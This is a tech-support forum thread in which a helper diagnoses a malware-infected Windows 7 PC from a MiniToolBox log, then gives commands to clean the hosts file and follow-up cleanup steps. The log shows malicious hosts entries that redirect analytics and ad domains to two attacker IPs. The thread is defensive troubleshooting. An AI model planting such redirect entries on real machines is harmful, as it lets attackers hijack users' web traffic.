Microsoft Windows 7 Professional Service Pack 1 (X64)
Boot Mode: Normal
***************************************************************************

========================= Flush DNS: ===================================

Windows IP Configuration

Successfully flushed the DNS Resolver Cache.

========================= IE Proxy Settings: ==============================

Proxy is not enabled.
No Proxy Server is set.

"Reset IE Proxy Settings": IE Proxy Settings were reset.

========================= FF Proxy Settings: ==============================


"Reset FF Proxy Settings": Firefox Proxy settings were reset.

========================= Hosts content: =================================







































































































































































































149.5.18.172 www.google-analytics.com.
149.5.18.172 ad-emea.doubleclick.net.
149.5.18.172 www.statcounter.com.
108.163.215.51 www.google-analytics.com.
108.163.215.51 ad-emea.doubleclick.net.
108.163.215.51 www.statcounter.com.

127.0.0.1 localhost

========================= IP Configuration: ================================

Intel® 82579V Gigabit Network Connection = Local Area Connection (Connected)
802.11bgn 1T1R Wireless Adapter = Wireless Network Connection (Hardware not present)
TAP-Win32 Adapter V9 = office (Media disconnected)
TAP-Win32 Adapter V9 = datacenter (Media disconnected)


# ----------------------------------
# IPv4 Configuration
# ----------------------------------
pushd interface ipv4

reset
set global icmpredirects=enabled


popd
# End of IPv4 configuration



Windows IP Configuration

Host Name . . . . . . . . . . . . : Owner-PC110658
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : home

Ethernet adapter datacenter:

Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : TAP-Win32 Adapter V9 #2
Physical Address. . . . . . . . . : 00-FF-45-B1-EB-02
DHCP Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes

Ethernet adapter office:

Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : TAP-Win32 Adapter V9
Physical Address. . . . . . . . . : 00-FF-41-2A-E7-35
DHCP Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . : home
Description . . . . . . . . . . . : Intel® 82579V Gigabit Network Connection
Physical Address. . . . . . . . . : 00-22-4D-4F-DC-F7
DHCP Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
Link-local IPv6 Address . . . . . : fe80::3040:4969:6b63:1f2a%11(Preferred)
IPv4 Address. . . . . . . . . . . : 192.168.1.8(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Lease Obtained. . . . . . . . . . : Monday, April 16, 2012 3:49:12 PM
Lease Expires . . . . . . . . . . : Tuesday, April 17, 2012 3:49:12 PM
Default Gateway . . . . . . . . . : 192.168.1.1
DHCP Server . . . . . . . . . . . : 192.168.1.1
DHCPv6 IAID . . . . . . . . . . . : 234889805
DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-15-9D-04-93-00-22-4D-4F-DC-F7
DNS Servers . . . . . . . . . . . : 192.168.1.1
NetBIOS over Tcpip. . . . . . . . : Enabled

Tunnel adapter isatap.{412AE735-DC18-481E-A693-7866D7D644DB}:

Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Microsoft ISATAP Adapter
Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes

Tunnel adapter Teredo Tunneling Pseudo-Interface:

Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Teredo Tunneling Pseudo-Interface
Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
IPv6 Address. . . . . . . . . . . : 2001:0:5ef5:79fb:300b:28b9:93e3:5a5d(Preferred)
Link-local IPv6 Address . . . . . : fe80::300b:28b9:93e3:5a5d%13(Preferred)
Default Gateway . . . . . . . . . : ::
NetBIOS over Tcpip. . . . . . . . : Disabled

Tunnel adapter isatap.{45B1EB02-5E3A-4784-9FF4-A1D7385E7208}:

Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Microsoft ISATAP Adapter #2
Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes

Tunnel adapter isatap.home:

Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . : home
Description . . . . . . . . . . . : Microsoft ISATAP Adapter #3
Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
Server: Wireless_Broadband_Router.home
Address: 192.168.1.1

Name: google.com
Addresses: 72.14.204.102
72.14.204.101
72.14.204.138
72.14.204.100
72.14.204.113


Pinging google.com [74.125.228.14] with 32 bytes of data:
Reply from 74.125.228.14: bytes=32 time=8ms TTL=252
Reply from 74.125.228.14: bytes=32 time=8ms TTL=252

Ping statistics for 74.125.228.14:
Packets: Sent = 2, Received = 2, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 8ms, Maximum = 8ms, Average = 8ms
Server: Wireless_Broadband_Router.home
Address: 192.168.1.1

Name: yahoo.com
Addresses: 72.30.38.140
98.139.183.24
209.191.122.70


Pinging yahoo.com [72.30.38.140] with 32 bytes of data:
Reply from 72.30.38.140: bytes=32 time=166ms TTL=250
Reply from 72.30.38.140: bytes=32 time=103ms TTL=250

Ping statistics for 72.30.38.140:
Packets: Sent = 2, Received = 2, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 103ms, Maximum = 166ms, Average = 134ms
Server: Wireless_Broadband_Router.home
Address: 192.168.1.1

Name: bleepingcomputer.com
Address: 208.43.87.2


Pinging bleepingcomputer.com [208.43.87.2] with 32 bytes of data:
Reply from 208.43.87.2: Destination host unreachable.
Reply from 208.43.87.2: Destination host unreachable.

Ping statistics for 208.43.87.2:
Packets: Sent = 2, Received = 2, Lost = 0 (0% loss),

Pinging 127.0.0.1 with 32 bytes of data:
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128

Ping statistics for 127.0.0.1:
Packets: Sent = 2, Received = 2, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
===========================================================================
Interface List
20...00 ff 45 b1 eb 02 ......TAP-Win32 Adapter V9 #2
19...00 ff 41 2a e7 35 ......TAP-Win32 Adapter V9
11...00 22 4d 4f dc f7 ......Intel® 82579V Gigabit Network Connection
1...........................Software Loopback Interface 1
12...00 00 00 00 00 00 00 e0 Microsoft ISATAP Adapter
13...00 00 00 00 00 00 00 e0 Teredo Tunneling Pseudo-Interface
15...00 00 00 00 00 00 00 e0 Microsoft ISATAP Adapter #2
16...00 00 00 00 00 00 00 e0 Microsoft ISATAP Adapter #3
===========================================================================

IPv4 Route Table
===========================================================================
Active Routes:
Network Destination Netmask Gateway Interface Metric
0.0.0.0 0.0.0.0 192.168.1.1 192.168.1.8 20
127.0.0.0 255.0.0.0 On-link 127.0.0.1 306
127.0.0.1 255.255.255.255 On-link 127.0.0.1 306
127.255.255.255 255.255.255.255 On-link 127.0.0.1 306
192.168.1.0 255.255.255.0 On-link 192.168.1.8 276
192.168.1.8 255.255.255.255 On-link 192.168.1.8 276
192.168.1.255 255.255.255.255 On-link 192.168.1.8 276
224.0.0.0 240.0.0.0 On-link 127.0.0.1 306
224.0.0.0 240.0.0.0 On-link 192.168.1.8 276
255.255.255.255 255.255.255.255 On-link 127.0.0.1 306
255.255.255.255 255.255.255.255 On-link 192.168.1.8 276
===========================================================================
Persistent Routes:
None

IPv6 Route Table
===========================================================================
Active Routes:
If Metric Network Destination Gateway
13 58 ::/0 On-link
1 306 ::1/128 On-link
13 58 2001::/32 On-link
13 306 2001:0:5ef5:79fb:300b:28b9:93e3:5a5d/128
On-link
11 276 fe80::/64 On-link
13 306 fe80::/64 On-link
13 306 fe80::300b:28b9:93e3:5a5d/128
On-link
11 276 fe80::3040:4969:6b63:1f2a/128
On-link
1 306 ff00::/8 On-link
13 306 ff00::/8 On-link
11 276 ff00::/8 On-link
===========================================================================
Persistent Routes:
None
========================= Winsock entries =====================================

Catalog5 01 C:\Windows\SysWOW64\NLAapi.dll [52224] (Microsoft Corporation)
Catalog5 02 C:\Windows\SysWOW64\napinsp.dll [52224] (Microsoft Corporation)
Catalog5 03 C:\Windows\SysWOW64\pnrpnsp.dll [65024] (Microsoft Corporation)
Catalog5 04 C:\Windows\SysWOW64\pnrpnsp.dll [65024] (Microsoft Corporation)
Catalog5 05 C:\Windows\SysWOW64\mswsock.dll [232448] (Microsoft Corporation)
Catalog5 06 C:\Windows\SysWOW64\winrnr.dll [20992] (Microsoft Corporation)
Catalog5 07 C:\Program Files (x86)\Bonjour\mdnsNSP.dll [121704] (Apple Inc.)
Catalog9 01 C:\Windows\SysWOW64\mswsock.dll [232448] (Microsoft Corporation)
Catalog9 02 C:\Windows\SysWOW64\mswsock.dll [232448] (Microsoft Corporation)
Catalog9 03 C:\Windows\SysWOW64\mswsock.dll [232448] (Microsoft Corporation)
Catalog9 04 C:\Windows\SysWOW64\mswsock.dll [232448] (Microsoft Corporation)
Catalog9 05 C:\Windows\SysWOW64\mswsock.dll [232448] (Microsoft Corporation)
Catalog9 06 C:\Windows\SysWOW64\mswsock.dll [232448] (Microsoft Corporation)
Catalog9 07 C:\Windows\SysWOW64\mswsock.dll [232448] (Microsoft Corporation)
Catalog9 08 C:\Windows\SysWOW64\mswsock.dll [232448] (Microsoft Corporation)
Catalog9 09 C:\Windows\SysWOW64\mswsock.dll [232448] (Microsoft Corporation)
Catalog9 10 C:\Windows\SysWOW64\mswsock.dll [232448] (Microsoft Corporation)
x64-Catalog5 01 C:\Windows\System32\NLAapi.dll [70656] (Microsoft Corporation)
x64-Catalog5 02 C:\Windows\System32\napinsp.dll [68096] (Microsoft Corporation)
x64-Catalog5 03 C:\Windows\System32\pnrpnsp.dll [86016] (Microsoft Corporation)
x64-Catalog5 04 C:\Windows\System32\pnrpnsp.dll [86016] (Microsoft Corporation)
x64-Catalog5 05 C:\Windows\System32\mswsock.dll [326144] (Microsoft Corporation)
x64-Catalog5 06 C:\Windows\System32\winrnr.dll [28672] (Microsoft Corporation)
x64-Catalog5 07 C:\Program Files\Bonjour\mdnsNSP.dll [132968] (Apple Inc.)
x64-Catalog9 01 C:\Windows\System32\mswsock.dll [326144] (Microsoft Corporation)
x64-Catalog9 02 C:\Windows\System32\mswsock.dll [326144] (Microsoft Corporation)
x64-Catalog9 03 C:\Windows\System32\mswsock.dll [326144] (Microsoft Corporation)
x64-Catalog9 04 C:\Windows\System32\mswsock.dll [326144] (Microsoft Corporation)
x64-Catalog9 05 C:\Windows\System32\mswsock.dll [326144] (Microsoft Corporation)
x64-Catalog9 06 C:\Windows\System32\mswsock.dll [326144] (Microsoft Corporation)
x64-Catalog9 07 C:\Windows\System32\mswsock.dll [326144] (Microsoft Corporation)
x64-Catalog9 08 C:\Windows\System32\mswsock.dll [326144] (Microsoft Corporation)
x64-Catalog9 09 C:\Windows\System32\mswsock.dll [326144] (Microsoft Corporation)
x64-Catalog9 10 C:\Windows\System32\mswsock.dll [326144] (Microsoft Corporation)

========================= Event log errors: ===============================

Application errors:
==================
Error: (04/16/2012 10:18:37 PM) (Source: SideBySide) (User: )
Description: Activation context generation failed for "C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest1".Error in manifest or policy file "C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest2" on line C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest3.
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest.
Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2.manifest.

Error: (04/16/2012 10:18:35 PM) (Source: SideBySide) (User: )
Description: Activation context generation failed for "C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest1".Error in manifest or policy file "C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest2" on line C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest3.
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest.
Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2.manifest.

Error: (04/16/2012 10:18:24 PM) (Source: SideBySide) (User: )
Description: Activation context generation failed for "C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest1".Error in manifest or policy file "C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest2" on line C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest3.
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest.
Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2.manifest.

Error: (04/16/2012 03:49:33 PM) (Source: WinMgmt) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (04/09/2012 01:10:22 PM) (Source: Application Error) (User: )
Description: Faulting application name: WINWORD.EXE, version: 11.0.5604.0, time stamp: 0x3f314a2f
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc000041d
Fault offset: 0x74e14f0d
Faulting process id: 0x1e5c
Faulting application start time: 0xWINWORD.EXE0
Faulting application path: WINWORD.EXE1
Faulting module path: WINWORD.EXE2
Report Id: WINWORD.EXE3

Error: (04/06/2012 02:59:29 PM) (Source: Application Error) (User: )
Description: Faulting application name: WINWORD.EXE, version: 11.0.5604.0, time stamp: 0x3f314a2f
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc000041d
Fault offset: 0x74e14f0d
Faulting process id: 0x1ef4
Faulting application start time: 0xWINWORD.EXE0
Faulting application path: WINWORD.EXE1
Faulting module path: WINWORD.EXE2
Report Id: WINWORD.EXE3

Error: (04/02/2012 09:10:03 PM) (Source: WinMgmt) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (04/02/2012 01:03:22 PM) (Source: WinMgmt) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (04/01/2012 05:23:46 PM) (Source: WinMgmt) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (03/30/2012 08:25:22 PM) (Source: WinMgmt) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003


System errors:
=============
Error: (04/16/2012 03:49:31 PM) (Source: Service Control Manager) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
luafv

Error: (04/16/2012 03:49:17 PM) (Source: Service Control Manager) (User: )
Description: The lxefCATSCustConnectService service failed to start due to the following error:
%%1053

Error: (04/16/2012 03:49:17 PM) (Source: Service Control Manager) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the lxefCATSCustConnectService service to connect.

Error: (04/02/2012 09:09:59 PM) (Source: Service Control Manager) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
luafv

Error: (04/02/2012 09:09:50 PM) (Source: Service Control Manager) (User: )
Description: The lxefCATSCustConnectService service failed to start due to the following error:
%%1053

Error: (04/02/2012 09:09:50 PM) (Source: Service Control Manager) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the lxefCATSCustConnectService service to connect.

Error: (04/02/2012 01:03:08 PM) (Source: Service Control Manager) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
luafv

Error: (04/02/2012 01:02:41 PM) (Source: Service Control Manager) (User: )
Description: The lxefCATSCustConnectService service failed to start due to the following error:
%%1053

Error: (04/02/2012 01:02:41 PM) (Source: Service Control Manager) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the lxefCATSCustConnectService service to connect.

Error: (04/01/2012 05:23:44 PM) (Source: Service Control Manager) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
luafv


Microsoft Office Sessions:
=========================
Error: (04/16/2012 10:18:37 PM) (Source: SideBySide)(User: )
Description: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifestC:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2.manifestC:\Users\Owner\Desktop\esetsmartinstaller_enu.exe

Error: (04/16/2012 10:18:35 PM) (Source: SideBySide)(User: )
Description: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifestC:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2.manifestC:\Users\Owner\Desktop\esetsmartinstaller_enu.exe

Error: (04/16/2012 10:18:24 PM) (Source: SideBySide)(User: )
Description: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifestC:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2.manifestC:\Users\Owner\Desktop\esetsmartinstaller_enu.exe

Error: (04/16/2012 03:49:33 PM) (Source: WinMgmt)(User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (04/09/2012 01:10:22 PM) (Source: Application Error)(User: )
Description: WINWORD.EXE11.0.5604.03f314a2funknown0.0.0.000000000c000041d74e14f0d1e5c01cd15648fefddfcC:\PROGRA~2\MICROS~1\OFFICE11\WINWORD.EXEunknowne3831dd8-8266-11e1-803a-00224d4fdcf7

Error: (04/06/2012 02:59:29 PM) (Source: Application Error)(User: )
Description: WINWORD.EXE11.0.5604.03f314a2funknown0.0.0.000000000c000041d74e14f0d1ef401cd141eb0b4c62cC:\PROGRA~2\MICROS~1\OFFICE11\WINWORD.EXEunknowna2a46109-801a-11e1-803a-00224d4fdcf7

Error: (04/02/2012 09:10:03 PM) (Source: WinMgmt)(User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (04/02/2012 01:03:22 PM) (Source: WinMgmt)(User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (04/01/2012 05:23:46 PM) (Source: WinMgmt)(User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (03/30/2012 08:25:22 PM) (Source: WinMgmt)(User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003


=========================== Installed Programs ============================

7-Zip 9.20
Adobe Acrobat X Pro - English, Français, Deutsch (Version: 10.1.3)
Adobe AIR (Version: 2.7.0.19530)
Adobe Community Help (Version: 3.4.980)
Adobe Creative Suite 5.5 Master Collection (Version: 5.5)
Adobe ExtendScript Toolkit 2 (Version: 2.0.2)
Adobe Flash Player 11 ActiveX 64-bit (Version: 11.2.202.233)
Adobe Flash Player 11 Plugin 64-bit (Version: 11.2.202.233)
Adobe Reader X (10.1.3) (Version: 10.1.3)
Adobe Setup (Version: 1.0)
Adobe Story (Version: 1.0.571)
Amazon MP3 Downloader 1.0.12 (Version: 1.0.12)
Apple Application Support (Version: 2.1.7)
Apple Mobile Device Support (Version: 5.1.1.4)
Apple Software Update (Version: 2.1.3.127)
Applian FLV and Media Player 3.1.1.12 (Version: 3.1.1.12)
AVS Screen Capture version 2.0.1
AVS Update Manager 1.0
AVS Video Converter 8
AVS Video Editor 6
AVS Video Recorder 2.4
AVS4YOU Software Navigator 1.4
BitTorrent (Version: 7.5.0)
BlitzIn 3.0
Bonjour (Version: 3.0.0.10)
CCleaner (Version: 3.17)
CDBurnerXP (Version: 4.3.8.2568)
Compatibility Pack for the 2007 Office system (Version: 12.0.6514.5001)
Dropbox (Version: 1.2.52)
ESET Online Scanner v3
FastStone Photo Resizer 3.1 (Version: 3.1)
Finale 2008 (Version: 13.1.9)
Garritan Instruments for Finale (Version: 1.0.13)
GoldWave v5.67
Google Chrome (Version: 18.0.1025.162)
Google Update Helper (Version: 1.3.21.111)
GPXtoPOI
Hydra
iCloud (Version: 1.1.0.40)
Intel® Management Engine Components (Version: 7.0.0.1144)
Intel® Network Connections 16.1.53.0 (Version: 16.1.53.0)
Intel® Rapid Storage Technology (Version: 10.1.0.1008)
iTunes (Version: 10.6.1.7)
iZotope Spectron for DirectX (Version: 1.0)
iZotope Trash for DirectX (Version: 1.0)
Java Auto Updater (Version: 2.0.6.1)
Java™ 6 Update 22 (Version: 6.0.220)
Java™ 6 Update 29 (Version: 6.0.290)
Karen's Directory Printer (Version: 5.3.0.2)
Lexmark S800 Series
LogMeIn (Version: 4.1.1868)
Machinarium (Version: 23.10.09)
Malwarebytes Anti-Malware version 1.61.0.1400 (Version: 1.61.0.1400)
marvell 61xx (Version: 1.2.0.7700)
Microsoft .NET Framework 4 Client Profile (Version: 4.0.30319)
Microsoft Office Professional Edition 2003 (Version: 11.0.5614.0)
Microsoft Visual C++ 2005 Redistributable (Version: 8.0.56336)
Microsoft Visual C++ 2005 Redistributable (Version: 8.0.61001)
Microsoft Visual C++ 2005 Redistributable (x64) (Version: 8.0.56336)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (Version: 9.0.30729)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (Version: 9.0.30729.4148)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (Version: 9.0.30729.4148)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (Version: 9.0.30729.6161)
Microsoft_VC80_ATL_x86 (Version: 8.0.50727.4053)
Microsoft_VC80_ATL_x86_x64 (Version: 8.0.50727.4053)
Microsoft_VC80_CRT_x86 (Version: 8.0.50727.4053)
Microsoft_VC80_CRT_x86_x64 (Version: 8.0.50727.4053)
Microsoft_VC80_MFC_x86 (Version: 8.0.50727.4053)
Microsoft_VC80_MFC_x86_x64 (Version: 8.0.50727.4053)
Microsoft_VC80_MFCLOC_x86 (Version: 8.0.50727.4053)
Microsoft_VC80_MFCLOC_x86_x64 (Version: 80.50727.4053)
Microsoft_VC90_ATL_x86 (Version: 1.00.0000)
Microsoft_VC90_ATL_x86_x64 (Version: 1.00.0000)
Microsoft_VC90_CRT_x86 (Version: 1.00.0000)
Microsoft_VC90_CRT_x86_x64 (Version: 1.00.0000)
Microsoft_VC90_MFC_x86 (Version: 1.00.0000)
Microsoft_VC90_MFC_x86_x64 (Version: 1.00.0000)
Microsoft_VC90_MFCLOC_x86 (Version: 1.00.0000)
Microsoft_VC90_MFCLOC_x86_x64 (Version: 1.00.0000)
MIDI-OX (Version: 7.02.372)
MobileMe Control Panel (Version: 3.1.8.0)
Motorola Bluetooth (Version: 3.0.02.285)
Moyea FLV Editor Lite version: 1.0.1.0
Mozilla Firefox 11.0 (x86 en-US) (Version: 11.0)
MozyHome (Version: 2.12.1.160)
Native Instruments Kontakt 3 (Version: 3.5.0.025)
Native Instruments Kontakt Factory Selection (Version: 1.0.0.002)
Native Instruments Service Center (Version: 2.2.0.367)
NexusFont 2.5 (ver 2.5.6.1478)
NVIDIA 3D Vision Controller Driver (Version: 275.33)
NVIDIA 3D Vision Controller Driver 275.33 (Version: 275.33)
NVIDIA 3D Vision Driver 275.33 (Version: 275.33)
NVIDIA Control Panel 275.33 (Version: 275.33)
NVIDIA Graphics Driver 275.33 (Version: 275.33)
NVIDIA HD Audio Driver 1.2.23.3 (Version: 1.2.23.3)
NVIDIA Install Application (Version: 2.275.80.0)
NVIDIA PhysX (Version: 9.10.0514)
NVIDIA PhysX System Software 9.10.0514 (Version: 9.10.0514)
NVIDIA Stereoscopic 3D Driver (Version: 7.17.12.7533)
NVIDIA Update 1.3.5 (Version: 1.3.5)
NVIDIA Update Components (Version: 1.3.5)
OpenVPN 2.1_rc20 (Version: 2.1_rc20)
Orion 7.6
Paragon Backup & Recovery™ 10 Suite (Version: 90.00.0003)
PDF Settings CS5 (Version: 10.0)
Plucked String
Poly850 VSTi/DXi v1.01 (Version: 1.0)
QuickTime (Version: 7.71.80.42)
Ralink RT2870 Wireless LAN Card (Version: 3.1.4.0)
Realtek High Definition Audio Driver (Version: 6.0.1.6392)
Renesas Electronics USB 3.0 Host Controller Driver (Version: 2.1.16.0)
RME Hammerfall DSP (WDM) (Version: 3.2.6.0)
Safari (Version: 5.34.55.3)
Scorpion
SiSoftware Sandra Lite 2011.SP3 (Version: 17.64.2011.7)
SpyHunter (Version: 4.8.13.3861)
SQLyog 5.19 (Version: 5.19)
TextPad 5 (Version: 5.4.2)
TortoiseSVN 1.7.6.22632 (64 bit) (Version: 1.7.22632)
Toxic 2.5
VirtualCloneDrive
WebEx
Windows Media Player Firefox Plugin (Version: 1.0.0.8)
WinSCP 4.3.5 (Version: 4.3.5)
X-Poly

========================= Memory info: ===================================

Percentage of memory in use: 54%
Total physical RAM: 8174.22 MB
Available physical RAM: 3716.45 MB
Total Pagefile: 16346.63 MB
Available Pagefile: 11696.43 MB
Total Virtual: 4095.88 MB
Available Virtual: 3968.04 MB

========================= Partitions: =====================================

1 Drive c: (OS) (Fixed) (Total:452.64 GB) (Free:389.76 GB) NTFS
3 Drive e: (Storage) (Fixed) (Total:931.51 GB) (Free:931.38 GB) NTFS
4 Drive f: (SimpleDrive) (Fixed) (Total:465.76 GB) (Free:364.15 GB) NTFS
5 Drive g: (WD SmartWare) (CDROM) (Total:0.6 GB) (Free:0 GB) UDF
6 Drive h: (My Passport) (Fixed) (Total:465.11 GB) (Free:399.31 GB) NTFS
7 Drive i: (ScribbyWibby) (Fixed) (Total:931.51 GB) (Free:53.79 GB) NTFS

========================= Users: ========================================

User accounts for \\OWNER-PC110658

Administrator Guest LogMeInRemoteUser
Owner UpdatusUser


**** End of log ****

#10 narenxp

narenxp

  • BC Advisor
  • 16,371 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:India
  • Local time:12:56 PM

Posted 16 April 2012 - 10:47 PM

Click on startmenu and type

cmd

right click on it and select run as administrator

Now type following commands and press ENTER one by one


cd c:\windows\system32\drivers\etc
takeown /a /f hosts
cacls hosts /p everyone:f
attrib -s -h -r hosts
notepad hosts


A notepad should pop up

Now scroll to the bottom and delete the fake entries

You can check here on default hosts entries for windows 7

http://support.microsoft.com/kb/972034

Save the notepad and run this command

attrib +s +h +r hosts

Now launch mini toolbox and checkmark hosts contents alone and post the new log

good luck

Edited by narenxp, 19 April 2012 - 08:44 AM.


#11 mattsbach

mattsbach
  • Topic Starter

  • Members
  • 85 posts
  • OFFLINE
  •  
  • Local time:01:56 PM

Posted 16 April 2012 - 10:53 PM

ok here it is:

MiniToolBox by Farbar Version: 18-01-2012
Ran by Owner (administrator) on 16-04-2012 at 23:53:25
Microsoft Windows 7 Professional Service Pack 1 (X64)
Boot Mode: Normal
***************************************************************************
========================= Hosts content: =================================



127.0.0.1 localhost


**** End of log ****

#12 narenxp

narenxp

  • BC Advisor
  • 16,371 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:India
  • Local time:12:56 PM

Posted 16 April 2012 - 11:11 PM

That looks good

Download

TFC


Launch it,it will close all running programs

click on START,it should ask for reboot

Turn off your system restore,restart the PC,create a new restore point

http://windows.microsoft.com/en-US/windows7/Turn-System-Restore-on-or-off

Update your JAVA from here

http://java.com/en/download/inc/windows_upgrade_xpi.jsp


